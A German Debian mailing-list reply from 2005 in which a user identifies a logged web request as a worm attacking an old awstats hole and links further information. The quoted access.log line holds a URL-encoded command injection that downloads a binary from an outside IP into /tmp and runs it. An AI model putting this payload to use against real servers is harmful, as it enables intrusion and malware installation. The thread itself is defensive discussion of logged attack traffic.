Re: Apache access.log

To: debian-user-german@lists.debian.org
Subject: Re: Apache access.log
From: Daniel Leidert <daniel.leidert.spam@gmx.net>
Date: Sat, 19 Nov 2005 19:33:23 +0100
Message-id: <[🔎] 1132425203.4038.11.camel@localhost>
In-reply-to: <[🔎] 1132424390.4038.7.camel@localhost>
References: <[🔎] 437F5129.4060105@rald.info> <[🔎] 1132424390.4038.7.camel@localhost>

Am Samstag, den 19.11.2005, 19:19 +0100 schrieb Daniel Leidert:
> Am Samstag, den 19.11.2005, 17:22 +0100 schrieb Harald Tobias:
> 
> [..]
> > 82.234.215.180 - - [15/Nov/2005:03:31:35 +0100] "GET 
> > /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
> >   HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 
> > 5.1;)"
> 
> Wurm. [..] Die Schwachstelle wurde IIRC schon vor einer ganzen Weile gefixt.

Hier noch etwas mehr Info. Dieser spezielle Wurm ist wohl doch noch sehr
jung.

http://vil.nai.com/vil/content/v_136821.htm

MfG Daniel

Reply to:

References:
- Apache access.log
  - From: Harald Tobias <h@rald.info>
- Re: Apache access.log
  - From: Daniel Leidert <daniel.leidert.spam@gmx.net>

Prev by Date: Re: Apache access.log
Next by Date: Re: Apache access.log
Previous by thread: Re: Apache access.log
Next by thread: Re: Apache access.log
Index(es):
- Date
- Thread